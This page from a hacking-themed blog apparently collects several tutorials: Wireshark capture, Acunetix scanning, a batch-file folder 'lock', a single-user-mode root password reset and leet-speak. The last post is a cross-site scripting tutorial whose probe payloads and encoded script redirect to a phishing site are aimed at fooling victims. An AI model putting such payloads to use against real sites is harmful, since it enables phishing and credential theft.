Wireshark

Hello GreenHackerz readers...

The article is about a tool known as wireshark. This is a tool used for analysing network.

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.

Wireshark is cross-platform, using the GTK+ widget toolkit to implement its user interface, and using pcap to capture packets; it runs on various Unix-like operating systems including Linux, Mac OS X, BSD, and Solaris, and on Microsoft Windows. There is also a terminal-based (non-GUI) version called TShark. Wireshark, and the other programs distributed with it such as TShark, are free software, released under the terms of the GNU General Public License.

Functionality: 

Wireshark is very similar to tcpdump, but has a graphical front-end, plus some integrated sorting and filtering options. Wireshark allows the user to put the network interfaces that support promiscuous mode into that mode, in order to to see all traffic visible on that interface, not just traffic addressed to one of the interface's configured addresses. On Linux, BSD, and Mac OS X, with libpcap 1.0.0 or later, Wireshark 1.4 and later can also put Wi-Fi adapters into monitor mode.

Features:

Wireshark is software that "understands" the structure of different networking protocols. Thus, it is able to display the encapsulation and the fields along with their meanings of different packets specified by different networking protocols. Wireshark uses pcap to capture packets, so it can only capture the packets on the types of networks that pcap supports.

• Data can be captured "from the wire" from a live network connection or read from a file that recorded already-captured packets.
• Live data can be read from a number of types of network, including Ethernet, IEEE 802.11, PPP, and loopback.
• Captured network data can be browsed via a GUI, or via the terminal (command line) version of the utility, TShark.
• Captured files can be programmatically edited or converted via command-line switches to the "editcap" program.
• Data display can be refined using a display filter.
• Plug-ins can be created for dissecting new protocols.
• VoIP calls in the captured traffic can be detected. If encoded in a compatible encoding, the media flow can even be played.
• Raw USB traffic can be captured with Wireshark.This feature is currently available only under Linux.

Wireshark's native network trace file format is the libpcap format supported by libpcap and WinPcap, so it can exchanges files of captured network traces with other applications using the same format, including tcpdump and CA NetMaster. It can also read captures from other network analysers, such as snoop, Network General's Sniffer, and Microsoft Network Monitor.

Security:

Capturing raw network traffic from an interface requires elevated privileges on some platforms. For this reason, older versions of Ethereal/Wireshark and tethereal/TShark often ran with superuser privileges. Taking into account the huge number of protocol dissectors that are called when traffic is captured, this can pose a serious security risk given the possibility of a bug in a dissector. Due to the rather large number of vulnerabilities in the past (of which many have allowed remote code execution) and developers' doubts for better future development, OpenBSD removed Ethereal from its ports tree prior to OpenBSD 3.6.

Elevated privileges are not needed for all of the operations. For example, an alternative is to run tcpdump, or the dumpcap utility that comes with Wireshark, with superuser privileges to capture packets into a file, and later analyze the packets by running Wireshark with restricted privileges. On wireless networks, it is possible to use the Aircrack wireless security tools to capture IEEE 802.11 frames and read the resulting dump files with Wireshark.

As of Wireshark 0.99.7, Wireshark and TShark run dumpcap to do traffic capture. On platforms where special privileges are needed to capture traffic, only dumpcap needs to be set up to run with those special privileges: neither Wireshark nor TShark need to run with special privileges, and neither of them should be run with special privileges.

Obtain appropriate Wireshark package

Obtain a Wireshark package or installer for the operating system running on the system which is to be used for packet capture.

Wireshark is included in Novell's SUSE Linux products (for some products, under its old name, Ethereal). For other platforms, download a binary or installer from http://www.wireshark.org. With installers, ensure all product components are selected for installation.

Start Wireshark:

Start Wireshark. On a Linux or Unix environment, select the Wireshark or Ethereal entry in the desktop environment's menu, or run "wireshark" (or "ethereal") from a root shell in a terminal emulator. In a Microsoft Windows environment, launch wireshark.exe from C:\Program Files\Wireshark.

Note: On Unix systems, a non-GUI version of Wireshark called "tshark" (or "tethereal") may be available as well, but its use is beyond the scope of this document.

Configure Wireshark:

After starting Wireshark, do the following:

1. Select Capture | Interfaces

2. Select the interface on which packets need to be captured.

3. If capture options need to be configured, click the Options button for the chosen interface. Note the following recommendations for traces that are to be analysed by Novell Technical Services.

• Capture packet in promiscuous mode: This option allows the adapter to capture all traffic not just traffic destined for this workstation. It should be enabled.
• Limit each packet to: Leave this option unset. Novell Support will always want to see full frames.
• Filters: Generally, Novell Support prefers an unfiltered trace. For documentation on filters, please refer to TID 10084702 - How to configure a capture filter for Ethereal (formerly NOVL90720).
• Capture file(s): This allows a file to be specified to be used for the packet capture. By default Wireshark will use temporary files and memory to capture traffic. Specify a file for reliability.
• Use multiple files, Ring buffer with: These options should be used when Wireshark needs to be left running capturing data data for a long period of time. The number of files is configurable. When a file fills up, it it will wrap to the next file. The file name should be specified if the ring buffer is to be used.
• Stop capture after xxx packet(s) captured: Novell Technical Support would most likely never use this option. Leave disabled.
• Stop capture after xxx kilobyte(s) captured: Novell Technical Support would most likely never use this option. Leave disabled.
• Stop capture after xxx second(s): Novell Technical Support would most likely never use this option. Leave disabled.
• Update list of packets in real time: Disable this option if the problem that's being investigated is occuring on the same workstation as where Wireshark is running.
• Automatic scrolling in live capture: Wireshark will scroll the window so that the most current packet is displayed.
• Hide capture info dialog: Disable this option so that you can view the count of packets being captured for each protocol.
• Enable MAC name resolution: Wireshark contains a table to resolve MAC addresses to vendors. Leave enabled.
• Enable network name resolution: Wireshark will issue DNS queries to resolve IP host names. Also will attempt to resolve network network names for other protocols. Leave disabled.
• Enable transport name resolution: Wireshark will attempt to resolve transport names. Leave disabled.

4. Now click the Start button to start the capture

5. Recreate the problem. The capture dialog should show the number of packets increasing. If not, then stop the capture. Examine the interface list and pick the one that is not associated with the WANIP. It will probably be a long alpha-numeric string. If packets are still not being captured, try removing any filters that have been defined.

6. Once the problem which is to be analysed has been reproduced, click on Stop. It might take a few seconds for Wireshark to display the packets captured.

If the destination address is always displayed as FFFFFFFF (IPX) or always ends in .255 (IP) then all that has been captured is broadcast traffic. This is a useless trace.

This usually occurs when another machine is being traced (to start the trace while the target machine is powered off, in order to capture the bootup process). The capture setup needs to be reconsidered - port mirroring on the switch may need to be set up, or a dumb hub may need to be used to make the traffic reach the sniffing system. (Some devices advertised as "hubs" are in fact switches that may have the intelligence to prevent the workstations from seeing each other's packets; with these, getting a good trace may not be possible)

The Wireshark website has a good FAQ on this subject. Please refer to http://www.wireshark.org/faq.html#q7.1

7. Save the packet trace in any supported format. Just click on the File menu option and select Save As. By default Wireshark will save the packet trace in libpcap format. This is a filename with a.pcap extension. Use this default for files sent to Novell.

8. Create a trace_info.txt file with the IP and MAC address of the machines that are being traced as well as any pertinent information, such as:

• What is the problem? (when did it start? steps to reproduce? any other pertinent information)
• What steps were traced?
• Give names of the servers and files being accessed.
• If analysis of the trace has already been attempted, please provide Novell Support with analysis notes.

      For example: Packets 1-30 are boot. Packets 31-500 are login. Packets 501 to 1,000 is my application 

      loading. Packet 1,001 to 1,500 is me saving my file. The error occurred at approximately packet 1,480.

• Give the MAC addresses of hardware involved? (Workstation, servers, printers ...)
• What is the workstation OS and configuration?
• What version of client software is running?
• If it works with one version of the client (or a particular server patch), then get a trace of it working, and a trace of it not working.
• For Novell Client issues: Are there any client patches loaded?
• For NetWare servers: What version of NetWare (and other relevant products i.e. ZEN or NDPS) are running on the server?
• What patches have been applied?
• What is the configuration of the network? Are there routers involved? If so, what kind of routers?

For Downloading the Wireshark, you can directly download it from the Wireshark website. The link is given below:

http://www.wireshark.org/download.html

Hope gives ample information to you and you like it.

  

Continue Reading...

Web Vulnerability Assessment

Hello GreenHackerz..

I hope you all enjoy & learn to be with Us..

Today I'm going to write something about Vulnerability, Vulnerability Assessment & Vulnerability Assessment Tools.. Hope you like it..

So Let's Start..

Vulnerability

In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance.
Vulnerability is the intersection of three elements :

(1) A system susceptibility or flaw

(2) Attacker access to the flaw

(3) Attacker capability to exploit the flaw

To be vulnerable, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface.

Vulnerability Assessment

A vulnerability assessment is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system. 

Web Vulnerability Assessment Essentials: Your First Step to a Highly Secure Web Site

If an organization isn't taking a systematic and proactive approach to web security, and to running a web application vulnerability assessment in particular, then that organization isn't defended against the most rapidly increasing class of attacks. Webbased attacks can lead to lost revenue, the theft of customers' personally identifiable financial information, and falling out of regulatory compliance with a multitude of government and industry mandates: the Payment Card Industry Data Security Standard (PCI) for merchants, HIPAA for health care organizations, or Sarbanes- Oxley for publicly traded companies. In fact, the research firm Gartner estimates that 75 percent of attacks on web security today are aimed straight at the application layer.

Just What Is a Web Application Vulnerability Assessment?

A web application vulnerability assessment is the way you go about identifying the mistakes in application logic, configurations, and software coding that jeopardize the availability (things like poor input validation errors that can make it possible for an attacker to inflict costly system and application crashes, or worse), confidentiality (SQL Injection attacks, among many other types of attacks that make it possible for attackers to gain access to confidential information), and integrity of your data (certain attacks make it possible for attackers to change pricing information, forexample).

Web application vulnerability scanners are very good at what they do: identifying technical programming mistakes and oversights that create holes in web security. These are coding errors, such as not checking input strings, or failure to properly filter database queries, that let attackers slip on in, access confidential information, and even crash your applications. Vulnerability scanners automate the process of finding these types of web security issues; they can tirelessly crawl through an application performing a vulnerability assessment, throwing countless variables into input fields in a matter of hours, a process that could take a person weeks to domanually.

How to Conducting Your Vulnerability Assessment?

To Conduct Web Vulnerability Assessment you must use Acunetix Web Vulnerability Scanner.

You can Download Acunetix Web Vulnerability Scanner from HERE

Acunetix Web Vulnerability Scanner

Introduction :-

• Acunetix web vulnerability scanner is a tool designed to discover security holes in your web applications that an attacker would likely abuse to gain illicit access to your systems and data. It looks for multiple vulnerabilities including SQL injection, cross site scripting, and weak passwords.
• The application can be used to perform scanning for web and application vulnerabilities and to perform penetration testing against the identified issues. Mitigation suggestions are then provided for each weakness and can be used to increase the security of the web server or application being tested.

Graphical Interfaces :

• The Scan Wizard allows you to quickly set-up an automated crawl and scan of your website. An automated scan provides a comprehensive and deep understanding of the level website security by simply reviewing the individual alerts returned.
• NOTE: DO NOT SCAN A WEBSITE WITHOUT PROPER AUTHORISATION! The web server logs will show the scans and any attacks made by Acunetix WVS. If you are not the sole administrator of the website please make sure to warn other administrators before performing a scan. Some scans might cause a website to crash requiring a restart of the website.

Select Target(s) to Scan:

(1) Click on ‘File > New > New Website Scan’ to start the Scan Wizard or click on ‘New Scan’ button on the top right hand of the Acunetix WVS user interface.

(2) Specify the target or targets to be scanned. The scan target options are:

• Scan single website - Scans a single website. Enter a URL, e.g. http://testphp.acunetix.com, https://.testaspnet.acunetix.com.
• Scan using saved crawling results - If you previously performed a crawl on a website and saved the results, you can analyze these results directly without having to crawl the site again. Specify the ‘Saved crawler results’ file by clicking on the folder button.
• Scan List of Websites - Scans a list of target websites specified in a plain text file (one target per line). Every target in the file is to be specified in the format <URL> or <URL:port> if the web server is listening on a non default port. The maximum number of websites Acunetix WVS can scan at 1 time is between 20 and 30 sites; depending on the size of the websites.
• Scan Range of Computers - This will scan a specific range of IP's (e.g. 192.168.0.10-192.168.0.200) for target sites which are open on the specified ports (Default 80, 81 and 443).

(3) Click 'Next' to continue.

Confirm Targets and Technologies Detected:

• Acunetix WVS will automatically probe the target website(s) for basic details such as operating system, web server, web server technologies and whether a custom error page is used (For more details on Custom Error Pages refer to page 26 of this manual).
• The web vulnerability scanner will optimize the scan for the selected technologies and use these details to reduce the number of tests performed which are not applicable (e.g. Acunetix WVS will not probe IIS tests on a UNIX system). This will reduce scanning time.
• Click on the relevant field and change the settings from the provided check boxes if you would like to add or remove scans for specific technologies

Confirm Targets and Technologies Detected:

Scanning Profile:

The Scanning Profile will determine which tests are to be carried out against the target site. For example, if you only want to test your website(s) for SQL injection, select the profile sql_injection and no additional tests would be performed. 

Pros:

1. Quick scanning
2. Specify custom error pages
3. Combines many tools into one application
4. High detection rate of vulnerabilities
5. Does not overrate minor vulnerabilities

Cons:

1. Reporting is not robust
2. Target identifier appeared to be buggy
3. Could use some interface tweaks

Hope you all like this... @@@@

Continue Reading...

How to lock folder without any software.

                         


Hello GreenHackerz readers.........
The post is funny and knowledgeable, it's about lock the folder without using any   software.

You can lock and unlock your folder with this simple trick !
Note: The trick is for windows XP users

The Procedure is as follow :
1. Make a folder on the desktop or any where else as you like and name it (give any name).
2. Now, open notepad and write "ren <your folder name> <again your folder name>.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
(without the double inverted commas) and now go to Notepad Menu File>save as.
3. In the ‘save as’ name it as lock.bat and click save ! (Note: Save this batch file where you create the folder).
4. Now, again open notepad and write "ren <your foldername>.{21EC2020-3AEA-1069-A2DD-08002B30309D} <your folder name>" and again go to Notepad Menu File>save as.
5. In the ‘save as’ name it as key.bat and click save ! (Note: Save this batch file at the same place where you saved the lock.bat and your folder).
6. Now, double click on the lock.bat to lock the folder and now if you open your folder, control panel will open up.
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data  inside the folder again.
8. Lock your folder and hide the key.bat somewhere else on your hard disk.
9. Whenever you want to open your folder just paste the key.bat to the place where is your folder and open your folder using it.

Nice and Funny trick.
Hope you like it.

Continue Reading...

Hacking Root Password of RedHat based operating System.

Hello GreenHackerz readers.

The tutorial is for Linux operating system.

The tutorial is all about hacking root password of RedHat / Fedora / or RedHat based Operating System.

When you lost your root password in a RedHat Linux Based systems you should first have access to the console, (the machine itself). For that you have to power on or reboot your machine as needed and wait until you get the following screen (or similar depending your system and configurations).

Note : Here I am using the Fedora operating system but the process is same for all RedHat based system.

 Now press 'a' and you will get the following screen......

 

now, give one space and press key '1' or write 'single' and hit enter button.

you will get the shell prompt screen as shown below 

now use the password changing command used in Linux i.e passwd and hit enter . It will directly ask you the new password for user 'root'.

now type reboot and hit enter. you have done .

It will reboot your computer and now login with your new password

thats all..

hope you enjoyed the tutorial.

Continue Reading...

The Hackers Language - l33t

Hello Green Hackerz readers.... 

The Tutorial is about the Language used by the Hackers which is called "Hackers Language".

Language, in short it's a mean to communicate with each other, people generally talk with each other by using sentences, phrases, etc, etc, there are many different languages which can be found spoken all over and around the world. Basically, every different country has its own language, so its not possible for others to communicate with them and also it's very hard for a person to learn  every those such languages. For this people had made a common language, which can be used to communicate with each and everyone, i.e., English.

Hackers have also found there own language, which they basically use to communicate with each other. 

The Hacker​'s language used by the hackers to communicate with each other hackers is 'leet'. For example , leet spelling of the word leet include 1337 and l33t. It was originally created by a groups of chatters/gamers in early 1980s, it was developed to frustrate text filters created by BBS or Internet Chat System Operators.

Its a cryptic writing language used to shorten the messages or rather as a form of encryption to hide the actual meaning. The main purpose of this was to prevent others from discouraging them from the discussion of some proscribed topics like hacking, cracking, many more.

Let's read in deep.........

Language helps re-enforce the barrier between computer hackers and non-hackers, as well as that between hackers and crackers. Computer hackers have developed their own language. Firstly there is vocabulary that non-hackers will not know (TCP, IP, winsock, Linux, root access, vi, etc) due to a lack of computer-related knowledge. Secondly, some computer hackers have modified English with a set of conventions. Hackers replace ‘f’ with ‘ph’ (likely coming from phreaks who were interested in ‘ph’ones), and ‘s’ with ‘z’. Also hackers use numbers in place of letters such as ‘1’ for ‘i’ or ‘l’ (though replacing ‘i’ is not the proper usage), ‘3’ for ‘E,’ ‘4’ for ‘a’, and ‘7’ for ‘t.’ Also it is important to use random caPitAlizaTioN, abbreviation, slang, emphasize words by putting ‘k-‘ before them ("k-rad"), and finish a statement with a series of characters for emphasis.

Take this example from an Internet Relay Chat message in a hacking group (#hack):

<elph> c4n sUm1 h31p m3 w1tH h4x0RiNg mY sk00lz c0mPz?!?!?!!?!?

Which translates to: "<elf> can someone help me with hacking my school’s computers?"

Lets take one more example.....

see the below image, the language used here is a leet.

The original is --

Google runs on a unique combination of advanced hardware and software. The speed you experience can be attributed in part to the efficiency of our search algorithm and partly to the thousands of low cost PC's we've networked together to create a superfast search engine. The heart of our software is PageRank (TM), a system for ranking web pages developed by our founders Larry Page and Sergey Brin at Stanford University. And while we have dozens of engineers working to improve every aspect of Google on a daily basis, PageRank continues to provide the basis for all of our web search tools.

According to "Lamer Speak," elf’s statement comes from the warez and crackerz subcultures. "Warez d00dz" are software pirates who are interested in copying the latest program (warez) or game (gamez). Crackers, in this sense, may refer to people who crack software protection or people who crack computer networks. While one will rarely seen this extreme form of the dialect in serious computer hacking circles (thus distinguishing them from crackers and warez d00dz), some of it is widely adopted (notably using ‘ph’ and ‘z’) and thus helps to distinguish them from non-hackers and nostalgic hackers who would never use this dialect. Perhaps newcomers to hacking use this language because they think it will help them gain acceptance, substituting the proper language for their lack of knowledge, by the gate-keeping elite. Or perhaps it is just seen by young teens as a cool way of talking. In real life, elf was banned (i.e. removed) from #hack very promptly after writing that statement. This exclusion is incredibly common, as newcomers are shot-down repeatedly for requesting help in Phrack, on IRC, and on alt.2600 (a hacking Internet discussion group).  

You can use this for creating your own

• A = 4, /-\, @, ^, /\ , //-\\, ci
• B = 8, ]3, ]8, |3, |8, ]]3, 13
• C = (, { , [[, <, €
• D = ), [}, |), |}, |>, [>, ]]), Ð
• E = 3, ii, €
• F = |=,(=, ]]=, ph
• G = 6, 9, (_>, [[6, &
• H = #, |-|, (-), )-(, }{, }-{, {-}, /-/, \-\, |~|, []-[], ]]-[[
• I = 1, !, |, ][, []
• J = _|, u|, ;_[], ;_[[
• K = |<, |{, ][<, ]]<, []<
• L = |,1, |_, []_, ][_, £
• M = /\/\, |\/|, [\/], (\/), /V\, []V[], \\\, (T), ^^, .\\, //., ][\\//][,
• N = /\/, |\|, (\), /|/, [\], {\}, ][\][, []\[], ~
• O = 0, (), [], <>, *, [[]]
• P = |D, |*, |>, []D, ][D
• Q = commas are necessary: (,) or 0, or O, or O\ or []\
• R = |2, |?, |-, ]]2 []2 ][2
• S = 5, $
• T = 7, +, ']‘, 7`, ~|~, -|-, ‘][', "|", †
• U = (_), |_|, \_\, /_/, \_/, []_[], ]_[, µ
• V = \/ , \\//
• W = \/\/, |/\|, [/\], (/\), VV, ///, \^/, \\/\//, 1/\/, \/1/, 1/1/
• X = ><, }{, )(, }[
• Y = ‘/, %, `/, \j , “//, ¥, j, \|/, -/
• Z = 2, z, 7_,`/_

Other than this there are so many converters available on net you can download from the below link.

l33t.exe

Make your own leet & enjoy.
Hope you like the tutorial ...

Continue Reading...

Cross Site Scripting

Hello GreenHackerz....

Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn’t intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them including the FBI, CNN, Ebay, Apple, Microsft, and AOL. Some website features commonly vulnerable to XSS attacks are:

• Search Engines

• Login Forms

• Comment Fields

There are three types of XSS attacks:

1. Local – Local XSS attacks are by far the rarest and the hardest to pull off. This attack requires an exploit for a browser vulnerability. With this type of attack, the hacker can install worms, spambots, and backdoors onto your computer.

2. Non-Persistent – Non-persistent attacks are the most common types of attack and don’t harm the actual website. Non-persistent attacks occur when (- a scripting language that is used for client-side web development.) or HTML is inserted into a variable which causes the output that the user sees to be changed. Non-persistent attacks are only activated when the user visits the URL crafted by the attacker.

3. Persistent – Persistent attacks are usually used against web applications like guest books, forums, and shout boxes. Some of the things a hacker can do with a persistent attacks are:

• Steal website cookies (Cookies are used by web browsers to store your user information so that you can stay logged into a website even after you leave. By stealing your cookie, the attacker can sometimes login without knowing your password.)

• Deface the website

• Spread Worms

Now that you know what cross site scripting is, how can you tell if a website if vulnerable to it?

1. If there is a search field, enter a word and if that word is displayed back to you on the next page, there’s a chance it is vulnerable.

2. Now we will insert some HTML. Search for <h1>hi</h1>, and if the word “hi” is outputted as a big header, it is vulnerable.

3. Now we will insert JavaScript. Search for <script>alert(“hi”);</script> , if the word “hi” pops up in a popup box, then the site is vulnerable to XSS.

4. As you can see, these examples are non-persistent. Now if a hacker found a guestbook or something else like it that was vulnerable, he would be able to make it persistent and everyone that visits the page would get the above alert if that was part of his comment.

Hackers knowledgeable in JavaScript and PHP will be able to craft advanced XSS attacks to steal your cookies and spread XSS worms, but to show you a simple example of something more realistic then the above examples, I will show you how a hacker could use XSS to help with phishing.

1. Let’s say a hacker wants to phish passwords from www.victim-site.com. If he was able to find an XSS vulnerability anywhere on the website, he would be able to craft a link pointing to the legit website that redirects to his phishing website.

2. In the example with the popup, when I inserted the JavaScript into the search box, a URL was formed that looked like the following:

Here you can see that the code you typed into the search box was passed to the “searchbox” variable.

3. In the URL the hacker would then replace everything in between ?searchbox= and &search with the following JavaScript code:

                           <script>window.location = “http://phishing-site.com”</script>

4. Now when you go to the finished link, the legitimate site will redirect to the phishing website. Next what the hacker would do is encode the URL to make it look more legit and less suspicious. You can encode the URL at http://www.encodeurl.com/ .

5. My finished encoded URL is: http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21

6. Once the victim sees that the link points to the legitimate website, he will be more likely to fall for the phishing attack.

Good Luck.
Enjoy the XSS attack...

Continue Reading...